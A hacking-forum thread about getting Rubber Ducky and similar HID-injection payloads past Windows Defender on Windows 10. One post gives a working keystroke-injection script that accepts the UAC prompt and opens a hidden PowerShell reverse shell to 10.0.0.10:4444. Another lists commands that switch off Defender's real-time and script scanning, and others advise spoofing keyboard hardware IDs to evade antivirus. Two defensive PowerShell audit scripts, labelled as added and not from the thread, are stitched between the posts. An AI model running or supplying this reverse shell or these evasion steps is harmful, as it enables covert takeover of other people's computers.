
Rubber Ducky outside Mr. Robot? Is any payload really working on Windows 10 with Defender active?


Phoenix75


Hi to all, I've bought this device for pentesting and learning. I'm quite a newbie about that kind of hardware, but it seems that the current Windows Defender of the Windows 1903 edition prevents every kind of payload from working. Is that true? I've tried about 50 payloads. With a system with Defender on, it doesn't start at all. I've also flashed the Ducky with Twin Duck... it seems that is worse: it sometimes takes time to analyze the USB and sometimes finds the inject.bin and removes it. All payloads with "gmail send" are not working because of authentication, every payload with password grabbing is not working because Nirsoft removed command line text export for security purposes... so is this a useless expensive USB key and nothing more?

Now, my question: is it really possible, outside the Mr. Robot series, to use that device in a real environment? Because I've invested about 20 hours on it and I don't find a way to make it have a real use if the system is protected... but I've spent about $90 in my country to buy it.

If someone has been able to make it work I will be glad to know.

Thank You.

 


Some of the payloads will not work due to security patches. This is not a device that you can plug into a computer and it magically works just because you saw it in a video... Obviously, you will have to modify and/or create (your own) payloads to bypass Windows Defender. I do not own a Ducky, but I do own a Bunny, which does work in a real environment (because I craft my own payloads).


Sorry... there must be some kind of misunderstanding. I'm telling you that if you plug the Ducky into a current Windows 10 environment, this environment doesn't permit the launch of the injection file... you're telling me that I have to improve. 🙂 If it isn't possible to launch a file from a USB keyboard emulator like the Rubber Ducky, the device is useless and, as you rightly told me, good only for online demos and for selling it. The thing that hurts me is that it is still sold on Amazon and on the Hak5 site when it's clear that today you can't use it in a real environment. If you tell me that the Bunny works maybe I can try... but I doubt that you can bypass a Windows machine with an antivirus with all modules enabled... have you tried? If it doesn't bypass, that will turn that hardware into a useless one too.

I'm talking about Windows because 95% of the PCs in the world are Windows based.

Thank you very much anyway for your support, nice to meet you. 


Guess I need a little more info. What is the build of your Win10 box? My latest is 17763 and the one I'm on at the moment is 14393. Both have Defender fully updated and I've been testing different inject.bin files on my Rubber Ducks all day. One even has the Twin Duck firmware on it. Win10 and Defender are not blocking or deleting anything. Could you give a bit more info on your machine? Or has anyone else run into issues with this as well? I'll gladly test what I can on my side to see if I can replicate the issues you are having.

Worst case you could always set up a VM and have it attack the VM, and with that you could put any OS you want on there. But like theUNKNOWN said, you'll have to do some work to get the duck to do what you'd like it to do.


Thank you all.

The Windows version I'm using is the latest 1903 (build 18362.295); the Ducky has the 2.1 firmware installed. I also tried Twin Duck 2.1 but it has a keyboard bug I've seen, so I've used 2.001. With Twin Duck the AV inspects the partition immediately and locks the injection file; sometimes it removes it.

I've tried 2 physical machines and 1 VM. Same behaviour. I still don't understand what you guys mean when you say "you have to work on it": if the system locks the USB device immediately when you plug it in, you can work for years but there's no solution to that... making the device a useless piece of plastic. :)

When I go home I'll try the Unknown script. I'll update you. Thank you for your help.


Ok, so very briefly I tried mine on 1903 and still so far so good. That was a VM though and I probably didn't give it enough time to fully update itself. So I'm going to let it run for a bit and make sure everything is fully up to date. I'll also install it on a fresh system and see if that makes a difference at all. But you did bring up a very good point and that's the firmware on the duck. Not sure how I can check mine but my ducks are older. I know back in the day there was a hardware version or something that had to do with the duck's color. I have a blue one and a green one. I think I've seen pics where there are red and maybe even black ones as well. Wouldn't think that would make a difference but maybe it does. I'll keep digging. I am glad to see that you're experimenting a bit though, using two physical machines and a VM. Much better than some people just saying "it doesn't work, it doesn't work". Awesome that you're troubleshooting. If you wouldn't mind, could you get an older version of Win10 and make a VM out of it? I'd be curious if you have the same issues or if it starts to work. One of the VMs I tested yesterday was from: https://developer.microsoft.com/en-us/microsoft-edge/tools/vms/


Bob, firstly thank you... I hold 35 technical certifications in systems, networks and security... I'm a 6-time MVP and a CEH... before coming here crying I've done something like 10 hours of trials. 😂 I'm quite sure that on a 1703 or 1803 Windows distribution it is working, but, surely, I can give it a try.

If Defender is down in the system (and there's a different suite like Kaspersky, for example) the Ducky runs. BUT if I turn on the rogue keyboard option in the Kaspersky suite you get the same behaviour: the payload doesn't work at all. Now, as you understand, it's clear that I don't want a magic wand for hacking everything, but a simple system with a professional AV is quite mandatory today. When I go to attend some colleagues' speeches about cybersecurity they're every time showing a magic device that, once plugged in, is working and magically cracks the host. I was tired of seeing that... so I tried to buy a "magic one" too, but that has only reinforced my idea: if a system is properly protected, cracking it without a social engineering attack is quite impossible.

Anyway, sorry for the talk. My duck is quite blue-green inside and black outside. It would be fantastic if you could tell me the firmware you've installed... but there are only 3 versions I've found for the classic duck and only another 3 for Twin Duck... all others are for other purposes.

Thank you for now. I'll update.

 


If you go to https://ducktoolkit.com/encode

and create a simple payload like the one kdodge has above. If you download the inject.bin, does your system react to it and delete it?

I wish I could have been more helpful but both a physical machine with 1903 and a VM with 1903 didn't seem to mind either of my ducks. Both were fully updated and I made sure Defender had all of the latest definitions. Is there anything else that could make your machine not like the duck? You're just using the Defender that came with Win10, correct? When you say you turn Defender off and use Kaspersky you also run into issues; does that mean you have two AVs installed on your machine? If so I wonder if it's Kaspersky the whole time. Which, if that's the case, then that's a good thing... Kaspersky is smart enough to not let a computer fall for the duck.

 


Quote

If you go to https://ducktoolkit.com/encode

and create a simple payload like the one kdodge has above. If you download the inject.bin, does your system react to it and delete it?

Sometimes yes, sometimes it simply doesn't start.

Quote

When you say you turn defender off and use Kaspersky you also run into issues, does that mean you have two AV's installed on your machine?  

I see that you're a Linux one 🙂 When you install a different AV on a Windows machine, Defender automatically disables itself because the system is happy that there's a new AV installed. It's quite impossible to uninstall Defender anyway.

Quote

What I suspect is the real problem: after Win10 boots up, and Kaspersky has that option enabled, he could plug in a plain old standard 104-key keyboard and the AV will have a temper tantrum, thinking it's a hack tool. At that point no HID injection will work.

Afterthought:

One thing he could try is to use the exact same VID/PID as the keyboard that is in use on the Win10. Kaspersky might be stupid enough to assume they are the same keyboard and you might just eke by. Or you might also need to alter the other 3 variables that I listed above to also mimic the current Win10 keyboard that's in use.

 

I agree with you. I think that with the right firmware maybe it can work. But finding the right one is not simple; I'll continue trying and update... thank you all.


So maybe I misunderstood something from the beginning. How I read your problem is you have a Win10 box at 1903 with Windows Defender (which is built in) and that's it. Is that not correct? Did you also have Kaspersky this whole time as well? I completely understand how AVs work. Windows wants something, so if you have Kaspersky it disables Defender. Likewise if you turn Kaspersky off Defender will kick in. So I guess the main question is: did you have Kaspersky installed but disabled the whole time? Or did you in fact have just a vanilla Win10 at 1903 with just Defender? If so then again I'm curious what makes your box different than mine. Or your duck different than mine. Because I set up a brand new box, put Win10 1903 with all the updates, all of the Defender updates, and I have absolutely no issues with either of my ducks. I can run a handful of scripts without issue. The only thing that barked at me yesterday was Defender didn't like me trying to use mimikatz, but that was it. So what could be different?

 


On 8/27/2019 at 3:04 PM, Bob123 said:

So maybe I miss understood something from the beginning.  How I read your problem is you have a Win10 box at 1903 with windows defender (which is built in) and that's it.  Is that not correct?  Did you also have Kaspersky this whole time as well? 

 

Correct. Kaspersky is another try. As you told me, when you put a different antivirus on, Defender goes down and kicks in only if you uninstall the third party AV. For completing the issue (and before coming here...) I've tried to use 1903 with a different AV also, because few people use Defender in a business environment. Anyway, my considerations are addressed at that: if a simple Defender can stop the Ducky, what can a professional AV do? The same thing. 🙂 Is there a way of knowing the firmware/release version of the duck and what kind of firmware is installed? I think the same as you: new Duckies are different from older ones... or... you have a firmware on it that bypasses all the issues I have...


@kdodge 

Quote

One thing he could try is to use the exact same VID/PID as the keyboard that is in use on the Win10. Kaspersky might be stupid enough to assume they are the same keyboard and you might just eke by. Or you might also need to alter the other 3 variables that I listed above to also mimic the current Win10 keyboard that's in use.

Maybe it works... but I don't know the ID of the keyboard in advance... you agree? 🙂 So... if I need to have access to the platform beforehand every time to find it, the Ducky becomes just a toy for the bathroom... :-)


  • 10 months later...

I have to agree. I'm truly disappointed with the Hak5 products, support and lack of up to date tutorials. I just purchased the essentials kit which, converted to my currency, is over $500 here in NZ. I have just spent the whole weekend learning to use the WiFi Pineapple and the Rubber Ducky. What I have found is that 99% of the payloads don't work, the tutorials are outdated or links are broken, and every time you encounter a problem it leads you to a solution that leads to another problem.

I believe Hak5 are completely misleading with their sales pitch and need to re-evaluate whether or not they are trading their products with a fair and reasonable expectation from the customer. I'm truly disappointed and would not recommend their products.


What's interesting is the Rubber Ducky has been a favorite parlor trick of mine for a few years. Taking the OSCP I thought I would dust it off and try it to create a c2c back to my son's computer to rickroll him for fun. And I have the same issue. Windows Defender keeps detecting it and blocking it once it tries to execute anything. I'm with the original poster: this was a cool hack, but like the Cap'n Crunch whistle, it might be past its prime now.


Man, I'm really not a fan of reliving the past but someone's going to have to tell me what they are doing to their Win10 1903 boxes. I have a Win10 1903 with Defender on by default. I have a Win10 1903 VM (several) with Defender on by default. Granted, when I have a payload with mimikatz or anything, Defender sees it as questionable and instantly deletes it on me, which is a huge pain in the... But I have never seen Windows Defender prevent my inject.bin from running. I'm not even sure how it would see it, as it's code execution from within the duck (keyboard)...

So I'd like to help but someone needs to explain what's different in their environment compared to mine. Unless something physically changed in the ducks. I have two. A blue one and a green one. I know they went through several small changes back in their prime but both of mine work exactly the same.

Of course, one other thing to point out. What are all of you trying to do? I'd suggest taking a step back and creating a payload that opens Notepad and says hello. Can your duck do that? Start there. Let me know what you had for results. Then we can go from there. I just got a MalDuino and it itself comes with nothing. So the first payload was Notepad. Then my favorite payload, which is to show all of the WiFi passwords. And then I have done more from there. But all of which were based off the duck and still to this day work on the duck.


So what are we saying here? Is Windows Defender blocking the hardware ID's of your duckys? 

Windows isn't privy to what your Ducky is running; all it knows is that it's a keyboard and that keyboard is pressing keys. The only way it could be actively blocking it is if it's blocked by hardware IDs, I believe.

So if you guys want to do a bit of digging, you'll find that it's quite easy to swap this to prevent AVs from identifying this shiny new HID product as a Ducky and make them think it's just a generic keyboard:

Honestly, guys, before going off on a tangent about how much you're entitled to some hand holding for buying a product (that requires development from the end user, might I add!!), do a little research.

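Two posts in this thread turn on the same question: the hardware IDs post above says Windows only sees a keyboard and can at most block by VID/PID, and Phoenix75 earlier objected that he cannot know the victim keyboard's ID in advance. The PowerShell below is an added example, not code from the thread or from Hak5: on any Windows 10 box it lists every keyboard-class device Windows has enrolled with its USB VID/PID, and it pulls the Kernel-PnP configuration events that record when a new HID keyboard was plugged in, which is also the defender's first place to look for an injector. Assumptions: the `Microsoft-Windows-Kernel-PnP/Configuration` log is enabled (it is by default on Windows 10), event IDs 400/410 are the device configured/started records, and the hypothetical 24-hour window is just a default.

```powershell
# Added example (not from the thread). Read-only: enumerates keyboards and their
# USB VID/PID, then lists recent HID keyboard arrivals from the Kernel-PnP log.

function Get-KeyboardIds {
    # Every device Windows has enrolled in the Keyboard setup class, present or not.
    Get-PnpDevice -Class Keyboard -ErrorAction SilentlyContinue | ForEach-Object {
        $vendorId = $null; $productId = $null    # $PID is a reserved automatic variable, so productId
        # USB/HID instance IDs look like HID\VID_046D&PID_C31C&MI_00\7&...;
        # PS/2 or ACPI keyboards carry no VID/PID and are reported as $null.
        if ($_.InstanceId -match 'VID_([0-9A-Fa-f]{4})&PID_([0-9A-Fa-f]{4})') {
            $vendorId  = $Matches[1].ToUpper()
            $productId = $Matches[2].ToUpper()
        }
        [pscustomobject]@{
            FriendlyName = $_.FriendlyName
            Status       = $_.Status      # OK = attached now, Unknown = seen before, not attached
            VID          = $vendorId
            PID          = $productId
            InstanceId   = $_.InstanceId
        }
    }
}

function Get-RecentKeyboardArrivals {
    param([int]$Hours = 24)
    # Assumption: Kernel-PnP logs 400 (device configured) / 410 (device started)
    # per device instance, with the instance ID embedded in the message text.
    $filter = @{
        LogName   = 'Microsoft-Windows-Kernel-PnP/Configuration'
        Id        = 400, 410
        StartTime = (Get-Date).AddHours(-$Hours)
    }
    Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue |
        Where-Object { $_.Message -match 'HID\\VID_' } |    # HID interfaces only, not the USB parent
        ForEach-Object {
            $vid = $null; $productId = $null
            if ($_.Message -match 'VID_([0-9A-Fa-f]{4})&PID_([0-9A-Fa-f]{4})') {
                $vid = $Matches[1].ToUpper(); $productId = $Matches[2].ToUpper()
            }
            [pscustomobject]@{
                Time = $_.TimeCreated
                Id   = $_.Id
                VID  = $vid
                PID  = $productId
            }
        } | Sort-Object Time -Descending
}

# Usage: what is enrolled now, and which HID keyboards arrived in the window.
$known = Get-KeyboardIds
$known | Format-Table FriendlyName, Status, VID, PID -AutoSize

# Mark each arrival with whether a keyboard carrying that VID:PID is still attached.
# An injector that was pulled out again shows up as Attached = False.
$attached = $known | Where-Object { $_.Status -eq 'OK' -and $_.VID } |
    ForEach-Object { "$($_.VID):$($_.PID)" }
Get-RecentKeyboardArrivals -Hours 24 |
    Select-Object Time, Id, VID, PID, @{n='Attached'; e={ "$($_.VID):$($_.PID)" -in $attached }} |
    Format-Table -AutoSize
```

Run it on the target as the tester to see which VID/PID a real keyboard there reports (the value the kdodge suggestion needs), and run it on a suspect host as the responder to see when a keyboard that nobody plugged in appeared. A rogue-keyboard feature in an AV product works on the same data; the duck's own VID/PID is a property of its firmware, not of inject.bin, so no payload edit changes it.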

  • 3 months later...
REM Open an elevated cmd via Win+R, Ctrl+Shift+Enter, accept the UAC prompt with Alt+Y
DELAY 1000
GUI r
DELAY 500
STRING cmd
CTRL-SHIFT ENTER
DELAY 500
ALT y
DELAY 500
REM Loosen the execution policy, then start a PowerShell reverse shell to the listener at 10.0.0.10:4444
REM (single STRING line: consecutive STRING lines would run "&&" straight into "powershell" with no space)
STRING powershell -WindowStyle hidden "Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy Unrestricted" && powershell -WindowStyle hidden -nop -exec bypass -c "$client = New-Object System.Net.Sockets.TCPClient('10.0.0.10',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes,0,$bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i);$sendback = (iex $data 2>&1 | Out-String);$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
DELAY 500
ENTER

 


Sorry about the premature enter 😮

I too am experiencing this same issue, where Windows Defender is deleting certain payloads and blocking certain commands/scripts.

It's important that I point out that I'm using a MalDuino and not a Rubber Ducky, the only significant difference being how they are programmed.

After a bit of research, I was able to determine that Windows Defender views certain payloads and/or scripts as malicious, thus deleting the payload or blocking the script. I use the above script.

You have to disable Windows Defender and disable script scanning.

Set-MpPreference -DisableIOAVProtection $true
Set-MpPreference -DisableRealtimeMonitoring $true
Set-MpPreference -DisableScriptScanning $true

There is one other issue to overcome, which I've not been able to so far. Windows Defender now has a Tamper Protection option, which it appears can only be disabled via the GUI. I tried to disable it via the registry but get an error. I can only assume that it can only be disabled via the system.

Hope this sheds a bit more light on the issue.

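The post above flips three `Set-MpPreference` switches and then runs into Tamper Protection. Before and after a lab attempt like that, a practitioner wants to know which of those switches actually changed and what Defender logged about it, because with Tamper Protection on, the `-Disable*` calls are ignored rather than rejected, and without it every such call leaves an event behind. The PowerShell below is an added example, not from the thread: it reports the relevant Defender state from `Get-MpComputerStatus` / `Get-MpPreference` and lists the Defender operational events that record configuration changes. Assumptions, labelled in the code: event IDs 5001/5004/5007 are the real-time-protection-disabled, real-time-configuration-changed and configuration-changed records, and the `TamperProtection` registry value under `HKLM:\SOFTWARE\Microsoft\Windows Defender\Features` mirrors the GUI setting (5 on, 4 off is what I have observed, not a documented contract).

```powershell
# Added example (not from the thread). Read-only audit of the Defender settings
# the Set-MpPreference lines in the post would change, plus the events they leave.

function Get-DefenderPosture {
    $status = Get-MpComputerStatus
    $pref   = Get-MpPreference
    [pscustomobject]@{
        AntivirusEnabled   = $status.AntivirusEnabled
        RealTimeProtection = $status.RealTimeProtectionEnabled   # DisableRealtimeMonitoring target
        IOAVProtection     = $status.IoavProtectionEnabled       # DisableIOAVProtection target
        # Get-MpPreference exposes the Disable* switches; invert them for readability.
        ScriptScanning     = -not $pref.DisableScriptScanning    # DisableScriptScanning target
        BehaviorMonitoring = -not $pref.DisableBehaviorMonitoring
        TamperProtected    = $status.IsTamperProtected           # present on 1903 and later
        SignatureAgeDays   = $status.AntivirusSignatureAge
    }
}

function Get-TamperProtectionRegistryValue {
    # Assumption (observed, not documented): 5 = on, 4 = off. Prefer IsTamperProtected above;
    # this is only here because the post mentions trying the registry.
    $key = 'HKLM:\SOFTWARE\Microsoft\Windows Defender\Features'
    (Get-ItemProperty -Path $key -Name TamperProtection -ErrorAction SilentlyContinue).TamperProtection
}

function Get-DefenderConfigChangeEvents {
    param([int]$Hours = 24)
    # Assumption: 5001 = real-time protection disabled, 5004 = real-time protection
    # configuration changed, 5007 = configuration changed (what Set-MpPreference leaves).
    $filter = @{
        LogName   = 'Microsoft-Windows-Windows Defender/Operational'
        Id        = 5001, 5004, 5007
        StartTime = (Get-Date).AddHours(-$Hours)
    }
    Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue |
        Select-Object TimeCreated, Id,
            @{n='Summary'; e={ ($_.Message -split "`n")[0].Trim() }} |   # first line of the message
        Sort-Object TimeCreated -Descending
}

# Usage: snapshot the posture, warn on the states that matter for a HID-injection payload,
# then show what Defender recorded in the last 24 hours.
$posture = Get-DefenderPosture
$posture | Format-List
"TamperProtection registry value: $(Get-TamperProtectionRegistryValue)"

if (-not $posture.TamperProtected) {
    Write-Warning 'Tamper Protection is off: Set-MpPreference -Disable* from an elevated shell will take effect.'
}
if (-not $posture.RealTimeProtection -or -not $posture.ScriptScanning) {
    Write-Warning 'Real-time protection or script scanning is already off; check the 5001/5007 events for when and by whom.'
}

Get-DefenderConfigChangeEvents -Hours 24 | Format-Table -AutoSize
```

Take one snapshot, type the three `Set-MpPreference` lines from the post in an elevated shell on a lab machine, and take another: on a box with Tamper Protection on, the posture does not change; on one without it, the three values flip and a 5007 (and, for real-time monitoring, a 5001) event appears, which is the trace a detection rule should fire on.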

  • 8 months later...

Sorry I am late as well.

I am having the same issue with the Digispark. Same concept though. Much like what H0nd0 said, just disable the firewall and script scanning. Use the

Set ExecutionPolicy to Bypass instead of "Unrestricted". Unrestricted prompts for permission when run (if run), whilst Bypass indicates "nothing is blocked and there are no warning prompts".


3 minutes ago, Doobiesnackin said:

Sorry I am late as well.

I am having the same issue with the Digispark. Same concept though. Much like what H0nd0 said, just disable the firewall and script scanning. Use the

Set ExecutionPolicy to Bypass instead of "Unrestricted". Unrestricted prompts for permission when run (if run), whilst Bypass indicates "nothing is blocked and there are no warning prompts".

It's not the same issue as the OP. Basically what the OP is saying is that Defender is blocking the Ducky / Bash Bunny by hardware ID, before it even gets the chance to do its thing.

 

The same will probably be true of the Digispark and other knock-offs; MS will gather a list of hardware IDs and block them.

 

The trick is to change the hardware IDs to something like a real keyboard etc.

 

Also, watch out for thread necro lol


Naw, I agree 100%, mine is working perfectly fine. I can run PowerShell one-liners etc. I was just giving a possibility of why it may not work (Windows Defender) rather than MS detecting it's a malicious device as is. I can't run Mimi and shit as my Windows Defender blocks that shit. I feel you though, yeah you're right 💯💯
